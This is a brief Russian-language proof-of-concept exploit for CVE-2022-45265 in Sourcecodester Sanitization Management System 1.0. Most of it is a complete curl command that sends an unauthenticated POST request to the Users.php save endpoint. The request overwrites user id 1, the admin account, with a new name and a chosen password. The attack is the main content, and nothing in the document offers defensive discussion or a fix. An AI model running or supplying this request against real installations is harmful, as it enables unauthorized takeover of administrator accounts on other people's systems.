
Эксплойт proof-of-concept для CVE-2022-45265, нацеленный на Sourcecodester Sanitization Management System 1.0, через неаутентифицированную модификацию пользователя с помощью POST-запроса к конечной точке save.
В Sanitization Management System (1.0) от sourcecodester.com
curl --location --request POST 'http://localhost/php-sms/classes/Users.php?f=save' \
--form 'id="1"' \
--form 'firstname="HACKED"' \
--form 'lastname="Administrator"' \
--form 'username="admin"' \
--form 'password="maikroservicewashere"'